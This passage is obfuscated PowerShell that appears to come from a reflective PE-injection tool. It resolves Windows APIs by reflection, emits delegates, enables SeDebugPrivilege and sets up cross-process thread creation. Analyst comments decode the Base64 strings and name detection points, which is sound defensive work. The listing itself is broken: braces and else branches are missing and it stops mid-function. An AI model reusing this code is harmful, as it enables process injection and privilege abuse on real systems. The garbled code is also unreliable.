${00011001001001100} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00111011100000100}, ${10010110111110101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value ${00011001001001100}
${10001101011111000} = _10001000101010101 kernel32.dll ReadProcessMemory
${10101011101111000} = _00101111101010001 @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
${00110111101100111} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10001101011111000}, ${10101011101111000})
$Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value ${00110111101100111}
${10111111000010101} = _10001000101010101 kernel32.dll CreateRemoteThread
${00001101011111111} = _00101111101010001 @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
${10101000000010001} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10111111000010101}, ${00001101011111111})
$Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value ${10101000000010001}
${01001101111010000} = _10001000101010101 kernel32.dll GetExitCodeThread
${10010010110011101} = _00101111101010001 @([IntPtr], [Int32].MakeByRefType()) ([Bool])
${10000101101110011} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${01001101111010000}, ${10010010110011101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value ${10000101101110011}
# --- Token and privilege APIs (Advapi32.dll) ---
${00100000010001100} = _10001000101010101 Advapi32.dll OpenThreadToken
${01101110011100100} = _00101111101010001 @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])
${00111011100101010} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00100000010001100}, ${01101110011100100})
$Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value ${00111011100101010}
${10101100110011110} = _10001000101010101 kernel32.dll GetCurrentThread
${01100010110001010} = _00101111101010001 @() ([IntPtr])
${01011111011101111} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10101100110011110}, ${01100010110001010})
$Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value ${01011111011101111}
${00010101110111111} = _10001000101010101 Advapi32.dll AdjustTokenPrivileges
${00101010001001111} = _00101111101010001 @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool])
${00110100100011000} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00010101110111111}, ${00101010001001111})
$Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value ${00110100100011000}
# The ANSI export LookupPrivilegeValueA is stored as LookupPrivilegeValue.
${10000110001101100} = _10001000101010101 Advapi32.dll LookupPrivilegeValueA
${01100001100000000} = _00101111101010001 @([String], [String], [IntPtr]) ([Bool])
${00110011000101110} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10000110001101100}, ${01100001100000000})
$Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value ${00110011000101110}
${00110110111011101} = _10001000101010101 Advapi32.dll ImpersonateSelf
${01010000011011010} = _00101111101010001 @([Int32]) ([Bool])
${01110110001101001} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${00110110111011101}, ${01010000011011010})
$Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value ${01110110001101001}
# The Base64 literal decodes (UTF-16LE) to "Version". NtCreateThreadEx from
# NtDll.dll is bound only when the OS version is >= 6.0 and < 6.2, i.e.
# Windows Vista / 7 and the matching server releases.
if (([Environment]::OSVersion.Version -ge (New-Object $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBlAHIAcwBpAG8AbgA='))) 6,0)) -and ([Environment]::OSVersion.Version -lt (New-Object $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBlAHIAcwBpAG8AbgA='))) 6,2))) {
${01000001000010010} = _10001000101010101 NtDll.dll NtCreateThreadEx
${01010001100011101} = _00101111101010001 @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])
${01010010100100100} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${01000001000010010}, ${01010001100011101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value ${01010010100100100}
}
${01011101011010101} = _10001000101010101 Kernel32.dll IsWow64Process
${00100000011001000} = _00101111101010001 @([IntPtr], [Bool].MakeByRefType()) ([Bool])
${00100100010111010} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${01011101011010101}, ${00100000011001000})
$Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value ${00100100010111010}
${10111101100101001} = _10001000101010101 Kernel32.dll CreateThread
${10011100110001101} = _00101111101010001 @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr])
${00100001001001010} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${10111101100101001}, ${10011100110001101})
$Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value ${00100001001001010}
return $Win32Functions
# Subtracts the second Int64 from the first byte by byte, carrying a borrow
# between bytes, and returns the result as an Int64. Working on the
# BitConverter byte arrays rather than on the signed values lets the script do
# address arithmetic without signed-overflow errors.
#
# Parameters: two mandatory [Int64] values (minuend at position 0, subtrahend
#             at position 1).
# Returns:    [Int64] rebuilt from the eight result bytes.
# Throws:     the Base64 literal decodes (UTF-16LE) to
#             "Cannot subtract bytearrays of different sizes".
#
# NOTE(review): braces, the closing ")" of Param and the `else` keywords are
# missing from this listing. The two consecutive assignments to the borrow
# variable (1, then 0) and the Throw presumably sat in if/else branches; as
# printed the control flow cannot be read off the text.
Function _10000100001010111
Param(
[Parameter(Position = 0, Mandatory = $true)]
[Int64]
${_01001011110000011},
[Parameter(Position = 1, Mandatory = $true)]
[Int64]
${_00111110010011101}
[Byte[]]${01001111110100001} = [BitConverter]::GetBytes(${_01001011110000011})
[Byte[]]${10001000000000100} = [BitConverter]::GetBytes(${_00111110010011101})
# Result buffer: the eight bytes of a zero UInt64.
[Byte[]]${01011100110011010} = [BitConverter]::GetBytes([UInt64]0)
if (${01001111110100001}.Count -eq ${10001000000000100}.Count)
# Borrow carried from the previous (lower-index) byte.
${10000010011001001} = 0
for (${01101000000100101} = 0; ${01101000000100101} -lt ${01001111110100001}.Count; ${01101000000100101}++)
${10100010010110000} = ${01001111110100001}[${01101000000100101}] - ${10000010011001001}
# When the working byte is smaller than the byte being subtracted, 256 is
# added to it and the borrow is set for the next byte.
if (${10100010010110000} -lt ${10001000000000100}[${01101000000100101}])
${10100010010110000} += 256
${10000010011001001} = 1
${10000010011001001} = 0
[UInt16]${00100011101111011} = ${10100010010110000} - ${10001000000000100}[${01101000000100101}]
${01011100110011010}[${01101000000100101}] = ${00100011101111011} -band 0x00FF
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAG4AbgBvAHQAIABzAHUAYgB0AHIAYQBjAHQAIABiAHkAdABlAGEAcgByAGEAeQBzACAAbwBmACAAZABpAGYAZgBlAHIAZQBuAHQAIABzAGkAegBlAHMA')))
return [BitConverter]::ToInt64(${01011100110011010}, 0)
# Adds two Int64 values byte by byte with a carry and returns the sum as an
# Int64. Other functions on this page call it to compute pointer + offset
# (for example handle + e_lfanew and start address + size).
#
# Parameters: two mandatory [Int64] values.
# Returns:    [Int64] rebuilt from the eight result bytes; a carry out of the
#             last byte is not stored anywhere in the visible lines.
# Throws:     the Base64 literal decodes (UTF-16LE) to
#             "Cannot add bytearrays of different sizes".
#
# NOTE(review): braces, the closing ")" of Param and the `else` keywords are
# missing from this listing, so the carry assignments (1, then 0) and the
# Throw appear as straight-line statements.
Function _01101001110001101
Param(
[Parameter(Position = 0, Mandatory = $true)]
[Int64]
${_01001011110000011},
[Parameter(Position = 1, Mandatory = $true)]
[Int64]
${_00111110010011101}
[Byte[]]${01001111110100001} = [BitConverter]::GetBytes(${_01001011110000011})
[Byte[]]${10001000000000100} = [BitConverter]::GetBytes(${_00111110010011101})
# Result buffer: the eight bytes of a zero UInt64.
[Byte[]]${01011100110011010} = [BitConverter]::GetBytes([UInt64]0)
if (${01001111110100001}.Count -eq ${10001000000000100}.Count)
# Carry from the previous (lower-index) byte.
${10000010011001001} = 0
for (${01101000000100101} = 0; ${01101000000100101} -lt ${01001111110100001}.Count; ${01101000000100101}++)
[UInt16]${00100011101111011} = ${01001111110100001}[${01101000000100101}] + ${10001000000000100}[${01101000000100101}] + ${10000010011001001}
# Low 8 bits are the result byte; bit 8 (0x100) signals a carry.
${01011100110011010}[${01101000000100101}] = ${00100011101111011} -band 0x00FF
if ((${00100011101111011} -band 0xFF00) -eq 0x100)
${10000010011001001} = 1
${10000010011001001} = 0
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAG4AbgBvAHQAIABhAGQAZAAgAGIAeQB0AGUAYQByAHIAYQB5AHMAIABvAGYAIABkAGkAZgBmAGUAcgBlAG4AdAAgAHMAaQB6AGUAcwA=')))
return [BitConverter]::ToInt64(${01011100110011010}, 0)
# Compares two Int64 values as unsigned numbers: the byte arrays are walked
# from the highest index down to 0 and the first differing byte decides.
#
# Parameters: two mandatory [Int64] values.
# Returns:    $true when the first value's byte is greater at the first
#             difference, $false when it is smaller; the trailing
#             `return $false` covers equal values.
# Throws:     the Base64 literal decodes (UTF-16LE) to
#             "Cannot compare byte arrays of different size".
#
# The index order assumes BitConverter emits the least significant byte first
# (little-endian host) - TODO confirm for the target platform.
# NOTE(review): braces, the closing ")" of Param and the `else` before Throw
# are missing from this listing.
Function _00010110101001010
Param(
[Parameter(Position = 0, Mandatory = $true)]
[Int64]
${_01001011110000011},
[Parameter(Position = 1, Mandatory = $true)]
[Int64]
${_00111110010011101}
[Byte[]]${01001111110100001} = [BitConverter]::GetBytes(${_01001011110000011})
[Byte[]]${10001000000000100} = [BitConverter]::GetBytes(${_00111110010011101})
if (${01001111110100001}.Count -eq ${10001000000000100}.Count)
for (${01101000000100101} = ${01001111110100001}.Count-1; ${01101000000100101} -ge 0; ${01101000000100101}--)
if (${01001111110100001}[${01101000000100101}] -gt ${10001000000000100}[${01101000000100101}])
return $true
elseif (${01001111110100001}[${01101000000100101}] -lt ${10001000000000100}[${01101000000100101}])
return $false
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBhAG4AbgBvAHQAIABjAG8AbQBwAGEAcgBlACAAYgB5AHQAZQAgAGEAcgByAGEAeQBzACAAbwBmACAAZABpAGYAZgBlAHIAZQBuAHQAIABzAGkAegBlAA==')))
return $false
# Reinterprets the bits of a UInt64 as an Int64: the value is serialised with
# BitConverter.GetBytes and read back with BitConverter.ToInt64, so no range
# check or overflow exception is involved.
#
# Parameters: $Value - mandatory [UInt64].
# Returns:    [Int64] with the same 64-bit pattern.
#
# This function kept its original name while most neighbours were renamed,
# which makes it a usable literal anchor when hunting for this script in
# logged script blocks.
# NOTE(review): the braces and the closing ")" of Param are missing from this
# listing.
Function Convert-UIntToInt
Param(
[Parameter(Position = 0, Mandatory = $true)]
[UInt64]
$Value
[Byte[]]${01011111100110111} = [BitConverter]::GetBytes($Value)
return ([BitConverter]::ToInt64(${01011111100110111}, 0))
# Formats a value as a "0x"-prefixed, zero-padded upper-case hex string.
#
# Parameters: $Value - mandatory, untyped; it is cast to [Int64] for
#             formatting.
# Returns:    the formatted string. The digit count is twice the marshalled
#             size of the value's type (Marshal.SizeOf * 2), i.e. two hex
#             digits per byte.
#
# NOTE(review): the function's braces are missing from this listing.
Function _00100010111110111
Param(
[Parameter(Position = 0, Mandatory = $true)]
$Value
)
${10011110011010000} = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Value.GetType()) * 2
${10100111010001000} = "0x{0:X$(${10011110011010000})}" -f [Int64]$Value
return ${10100111010001000}
# Bounds check for a planned memory write: verifies that the range
# [start address, start address + size] lies inside the region described by
# the PE-info object, and throws otherwise.
#
# Parameters:
#   position 0 [String]  - text inserted into the error messages (both
#                          messages end with this parameter's expansion).
#   position 1 [Object]  - PE-info object; its PEHandle and EndAddress
#                          properties are read here.
#   position 2 [IntPtr]  - start address of the write.
#   position 3 [IntPtr]  - size of the write (parameter set "Size").
# Returns: nothing in the visible lines; the function signals failure by
#          throwing.
# Throws (Base64 literals decoded as UTF-16LE, then expanded with
# $ExecutionContext.InvokeCommand.ExpandString):
#   "Trying to write to memory smaller than allocated address range. ..."
#   "Trying to write to memory greater than allocated address range. ..."
#
# Both comparisons go through _00010110101001010, which compares the values
# as unsigned numbers.
# NOTE(review): braces and the closing ")" of Param are missing from this
# listing, so each Throw appears unconditional in the text.
Function _10111001011100100
Param(
[Parameter(Position = 0, Mandatory = $true)]
[String]
${_00011000000111011},
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
${_00110100101000100},
[Parameter(Position = 2, Mandatory = $true)]
[IntPtr]
${_01110111110010110},
[Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)]
[IntPtr]
${_00100011000001010}
# End of the requested range: start address + size.
[IntPtr]${00000011001011010} = [IntPtr](_01101001110001101 (${_01110111110010110}) (${_00100011000001010}))
${01100100110010111} = ${_00110100101000100}.EndAddress
# Region base (PEHandle) greater than the start address -> write begins below
# the region.
if ((_00010110101001010 (${_00110100101000100}.PEHandle) (${_01110111110010110})) -eq $true)
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAHkAaQBuAGcAIAB0AG8AIAB3AHIAaQB0AGUAIAB0AG8AIABtAGUAbQBvAHIAeQAgAHMAbQBhAGwAbABlAHIAIAB0AGgAYQBuACAAYQBsAGwAbwBjAGEAdABlAGQAIABhAGQAZAByAGUAcwBzACAAcgBhAG4AZwBlAC4AIAAkAHsAXwAwADAAMAAxADEAMAAwADAAMAAwADAAMQAxADEAMAAxADEAfQA=')))
# Computed end greater than EndAddress -> write runs past the region.
if ((_00010110101001010 (${00000011001011010}) (${01100100110010111})) -eq $true)
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VAByAHkAaQBuAGcAIAB0AG8AIAB3AHIAaQB0AGUAIAB0AG8AIABtAGUAbQBvAHIAeQAgAGcAcgBlAGEAdABlAHIAIAB0AGgAYQBuACAAYQBsAGwAbwBjAGEAdABlAGQAIABhAGQAZAByAGUAcwBzACAAcgBhAG4AZwBlAC4AIAAkAHsAXwAwADAAMAAxADEAMAAwADAAMAAwADAAMQAxADEAMAAxADEAfQA=')))
# Copies a managed byte array to an unmanaged address one byte at a time with
# Marshal.WriteByte(address, offset, value).
#
# Parameters:
#   position 0 [Byte[]] - bytes to write.
#   position 1 [IntPtr] - destination address.
# Returns: nothing in the visible lines.
#
# No length or range check is made in this function; whether the destination
# is large enough is left to the caller.
# NOTE(review): the braces and the closing ")" of Param are missing from this
# listing.
Function _01011110000000101
Param(
[Parameter(Position=0, Mandatory = $true)]
[Byte[]]
${_00101110110110110},
[Parameter(Position=1, Mandatory = $true)]
[IntPtr]
${_10010100011101100}
for (${10110100111011010} = 0; ${10110100111011010} -lt ${_00101110110110110}.Length; ${10110100111011010}++)
[System.Runtime.InteropServices.Marshal]::WriteByte(${_10010100011101100}, ${10110100111011010}, ${_00101110110110110}[${10110100111011010}])
# Emits a delegate type at run time with System.Reflection.Emit and writes it
# to the pipeline. Callers pass the result to
# Marshal.GetDelegateForFunctionPointer to call a native export.
#
# Parameters:
#   position 0 [Type[]] - parameter types of the delegate (default: empty).
#   position 1 [Type]   - return type of the delegate (default: [Void]).
# Output: the created [Type] (via `echo`).
#
# String literals are Base64-encoded UTF-16LE and decode to:
#   assembly name   "ReflectedDelegate"
#   module name     "InMemoryModule"
#   type name       "MyDelegateType"
#   type attributes "Class, Public, Sealed, AnsiClass, AutoClass"
#   ctor attributes "RTSpecialName, HideBySig, Public"
#   method name     "Invoke", "Public, HideBySig, NewSlot, Virtual"
#   impl flags      "Runtime, Managed"
#
# Analyst note: the assembly is defined with AssemblyBuilderAccess.Run, i.e.
# it is never saved to disk. The decoded names above are not visible to a
# plain-text search of the script; match on the Base64 forms or on the decoded
# values that the runtime sees.
# NOTE(review): the braces and the parentheses of Param are missing from this
# listing.
Function _00101111101010001
Param
[OutputType([Type])]
[Parameter( Position = 0)]
[Type[]]
${_01010010100011010} = (New-Object Type[](0)),
[Parameter( Position = 1 )]
[Type]
${_10101111001111110} = [Void]
${01010101000100100} = [AppDomain]::CurrentDomain
${01000001000010111} = New-Object System.Reflection.AssemblyName($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBlAGYAbABlAGMAdABlAGQARABlAGwAZQBnAGEAdABlAA=='))))
${01011010111011001} = ${01010101000100100}.DefineDynamicAssembly(${01000001000010111}, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
${00101100111000111} = ${01011010111011001}.DefineDynamicModule($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAE0AZQBtAG8AcgB5AE0AbwBkAHUAbABlAA=='))), $false)
# The new type derives from System.MulticastDelegate.
${10001111001010101} = ${00101100111000111}.DefineType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQB5AEQAZQBsAGUAZwBhAHQAZQBUAHkAcABlAA=='))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwBsAGEAcwBzACwAIABQAHUAYgBsAGkAYwAsACAAUwBlAGEAbABlAGQALAAgAEEAbgBzAGkAQwBsAGEAcwBzACwAIABBAHUAdABvAEMAbABhAHMAcwA='))), [System.MulticastDelegate])
${00100101100110010} = ${10001111001010101}.DefineConstructor($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBUAFMAcABlAGMAaQBhAGwATgBhAG0AZQAsACAASABpAGQAZQBCAHkAUwBpAGcALAAgAFAAdQBiAGwAaQBjAA=='))), [System.Reflection.CallingConventions]::Standard, ${_01010010100011010})
${00100101100110010}.SetImplementationFlags($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgB1AG4AdABpAG0AZQAsACAATQBhAG4AYQBnAGUAZAA='))))
# The Invoke method carries the requested return type and parameter types.
${00010111100001001} = ${10001111001010101}.DefineMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAbwBrAGUA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEgAaQBkAGUAQgB5AFMAaQBnACwAIABOAGUAdwBTAGwAbwB0ACwAIABWAGkAcgB0AHUAYQBsAA=='))), ${_10101111001111110}, ${_01010010100011010})
${00010111100001001}.SetImplementationFlags($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgB1AG4AdABpAG0AZQAsACAATQBhAG4AYQBnAGUAZAA='))))
echo ${10001111001010101}.CreateType()
# Resolves the address of a native export by reflecting into a framework
# type instead of declaring a P/Invoke signature.
#
# Parameters:
#   position 0 [String] - module name (e.g. kernel32.dll at the call sites).
#   position 1 [String] - export name.
# Output: the value returned by the reflected GetProcAddress (via `echo`).
#
# String literals are Base64-encoded UTF-16LE and decode to:
#   "System.dll", "Microsoft.Win32.UnsafeNativeMethods",
#   "GetModuleHandle", "GetProcAddress", "Public,Static".
#
# Flow: pick the loaded assembly whose file name is System.dll and which comes
# from the GAC, get the UnsafeNativeMethods type from it, invoke its
# GetModuleHandle on the module name, wrap the handle in a HandleRef and
# invoke its GetProcAddress with the export name.
#
# Analyst note: reflection over Microsoft.Win32.UnsafeNativeMethods from a
# script is uncommon in administrative PowerShell and is a useful content
# signature for script block logging and AMSI-based rules; here the type and
# method names only appear after Base64 decoding.
# NOTE(review): no null check follows GetModuleHandle in the visible lines,
# and the braces and the parentheses of Param are missing from this listing.
Function _10001000101010101
Param
[OutputType([IntPtr])]
[Parameter( Position = 0, Mandatory = $True )]
[String]
${_10100011010001011},
[Parameter( Position = 1, Mandatory = $True )]
[String]
${_10010100011011100}
${10010110000110111} = [AppDomain]::CurrentDomain.GetAssemblies() |
? { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBkAGwAbAA=')))) }
${00101101111010000} = ${10010110000110111}.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIALgBVAG4AcwBhAGYAZQBOAGEAdABpAHYAZQBNAGUAdABoAG8AZABzAA=='))))
${10100001011111110} = ${00101101111010000}.GetMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQATQBvAGQAdQBsAGUASABhAG4AZABsAGUA'))))
# The GetProcAddress overload is selected explicitly by its parameter types
# (HandleRef, string).
${00101011111111000} = ${00101101111010000}.GetMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzAA=='))), [reflection.bindingflags] $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA='))), $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);
${10111000110001111} = ${10100001011111110}.Invoke($null, @(${_10100011010001011}))
${10100010010011100} = New-Object IntPtr
${01010110011110000} = New-Object System.Runtime.InteropServices.HandleRef(${10100010010011100}, ${10111000110001111})
echo ${00101011111111000}.Invoke($null, @([System.Runtime.InteropServices.HandleRef]${01010110011110000}, ${_10010100011011100}))
# Enables a privilege on the token of the current thread. The privilege name
# is a Base64-encoded UTF-16LE literal that decodes to "SeDebugPrivilege".
#
# Parameters: $Win32Functions, $Win32Types, $Win32Constants - the objects
#             holding the API delegates, the marshalling struct types and the
#             numeric constants used below.
# Returns:    nothing in the visible lines.
# Throws (decoded messages):
#   "Unable to get the handle to the current thread"
#   "Unable to impersonate self"
#   "Unable to OpenThreadToken."  (also a variant with the error code appended)
#   "Unable to call LookupPrivilegeValue"
#
# Flow: GetCurrentThread -> OpenThreadToken(TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES)
# -> on ERROR_NO_TOKEN, ImpersonateSelf(3) and a second OpenThreadToken
# -> LookupPrivilegeValue -> build TOKEN_PRIVILEGES -> AdjustTokenPrivileges.
#
# Analyst notes:
# - The function name is not obfuscated, so it is a cheap literal to match in
#   logged script blocks; the privilege name itself is encoded.
# - A PowerShell host enabling SeDebugPrivilege is worth alerting on. Where
#   token-right auditing is enabled, Windows Security event 4703 records the
#   adjustment.
# - Restricting the "Debug programs" user right to the accounts that need it
#   means the privilege is absent from most tokens and cannot be enabled.
# NOTE(review): in the visible lines only the TOKEN_PRIVILEGES buffer is freed;
# the LUID buffer is not freed and the token handle is not closed. No statement
# follows the final error condition, and the braces, `else` keywords and the
# closing ")" of Param are missing from this listing.
Function Enable-SeDebugPrivilege
Param(
[Parameter(Position = 1, Mandatory = $true)]
[System.Object]
$Win32Functions,
[Parameter(Position = 2, Mandatory = $true)]
[System.Object]
$Win32Types,
[Parameter(Position = 3, Mandatory = $true)]
[System.Object]
$Win32Constants
[IntPtr]${01110010011011000} = $Win32Functions.GetCurrentThread.Invoke()
if (${01110010011011000} -eq [IntPtr]::Zero)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABnAGUAdAAgAHQAaABlACAAaABhAG4AZABsAGUAIAB0AG8AIAB0AGgAZQAgAGMAdQByAHIAZQBuAHQAIAB0AGgAcgBlAGEAZAA=')))
# Receives the thread token handle by reference.
[IntPtr]${01000000010001011} = [IntPtr]::Zero
[Bool]${01111011110110011} = $Win32Functions.OpenThreadToken.Invoke(${01110010011011000}, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]${01000000010001011})
if (${01111011110110011} -eq $false)
${00011001000100011} = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
# ERROR_NO_TOKEN: the thread has no token of its own yet, so the code
# impersonates itself and retries. 3 corresponds to SecurityDelegation in the
# SECURITY_IMPERSONATION_LEVEL enumeration.
if (${00011001000100011} -eq $Win32Constants.ERROR_NO_TOKEN)
${01111011110110011} = $Win32Functions.ImpersonateSelf.Invoke(3)
if (${01111011110110011} -eq $false)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABpAG0AcABlAHIAcwBvAG4AYQB0AGUAIABzAGUAbABmAA==')))
${01111011110110011} = $Win32Functions.OpenThreadToken.Invoke(${01110010011011000}, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]${01000000010001011})
if (${01111011110110011} -eq $false)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABPAHAAZQBuAFQAaAByAGUAYQBkAFQAbwBrAGUAbgAuAA==')))
Throw $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABPAHAAZQBuAFQAaAByAGUAYQBkAFQAbwBrAGUAbgAuACAARQByAHIAbwByACAAYwBvAGQAZQA6ACAAJAB7ADAAMAAwADEAMQAwADAAMQAwADAAMAAxADAAMAAwADEAMQB9AA==')))
# Unmanaged buffer that LookupPrivilegeValue fills with the privilege LUID.
[IntPtr]${00001101000001001} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID))
${01111011110110011} = $Win32Functions.LookupPrivilegeValue.Invoke($null, $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBlAEQAZQBiAHUAZwBQAHIAaQB2AGkAbABlAGcAZQA='))), ${00001101000001001})
if (${01111011110110011} -eq $false)
Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABjAGEAbABsACAATABvAG8AawB1AHAAUAByAGkAdgBpAGwAZQBnAGUAVgBhAGwAdQBlAA==')))
# TOKEN_PRIVILEGES with a single entry: the looked-up LUID marked
# SE_PRIVILEGE_ENABLED, marshalled back into the unmanaged buffer.
[UInt32]${10001001010101111} = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES)
[IntPtr]${10100101111101010} = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(${10001001010101111})
${01100011110101010} = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${10100101111101010}, [Type]$Win32Types.TOKEN_PRIVILEGES)
${01100011110101010}.PrivilegeCount = 1
${01100011110101010}.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure(${00001101000001001}, [Type]$Win32Types.LUID)
${01100011110101010}.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED
[System.Runtime.InteropServices.Marshal]::StructureToPtr(${01100011110101010}, ${10100101111101010}, $true)
${01111011110110011} = $Win32Functions.AdjustTokenPrivileges.Invoke(${01000000010001011}, $false, ${10100101111101010}, ${10001001010101111}, [IntPtr]::Zero, [IntPtr]::Zero)
# The last-error value is checked in addition to the Bool result.
${00011001000100011} = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
if ((${01111011110110011} -eq $false) -or (${00011001000100011} -ne 0))
[System.Runtime.InteropServices.Marshal]::FreeHGlobal(${10100101111101010})
# Starts a thread in another process and returns its handle.
#
# Parameters:
#   position 1 [IntPtr] - handle of the target process.
#   position 2 [IntPtr] - start address of the new thread.
#   position 3 [IntPtr] - argument pointer passed to the thread
#                         (optional, default IntPtr.Zero).
#   position 4 [Object] - $Win32Functions, the API delegate table.
# Returns: the thread handle.
# Errors (Base64 literals decoded as UTF-16LE):
#   "Error in NtCreateThreadEx. Return value: ... LastError: ..."
#   "Error creating remote thread, thread handle is null"
#   (the latter raised with Write-Error -ErrorAction Stop)
#
# Two creation paths are visible: NtCreateThreadEx (desired access 0x1FFFFF)
# guarded by an OS-version test of >= 6.0 and < 6.2, and CreateRemoteThread
# with a stack-size argument of 0xFFFF.
#
# Analyst note: thread creation across process boundaries is the observable
# side of this function; endpoint telemetry that records remote thread
# creation (for example Sysmon event ID 8) with a PowerShell host as the
# source process is the matching detection point.
# NOTE(review): braces, the `else` keyword and the closing ")" of Param are
# missing from this listing, so the two paths appear sequential in the text.
Function _00100111111000100
Param(
[Parameter(Position = 1, Mandatory = $true)]
[IntPtr]
${_10011010100110011},
[Parameter(Position = 2, Mandatory = $true)]
[IntPtr]
${_01110111110010110},
[Parameter(Position = 3, Mandatory = $false)]
[IntPtr]
${_00011010100011100} = [IntPtr]::Zero,
[Parameter(Position = 4, Mandatory = $true)]
[System.Object]
$Win32Functions
# Thread handle; NtCreateThreadEx fills it by reference.
[IntPtr]${01110010011011110} = [IntPtr]::Zero
${01010101101001001} = [Environment]::OSVersion.Version
# The Base64 literal decodes to "Version" (the type name given to New-Object).
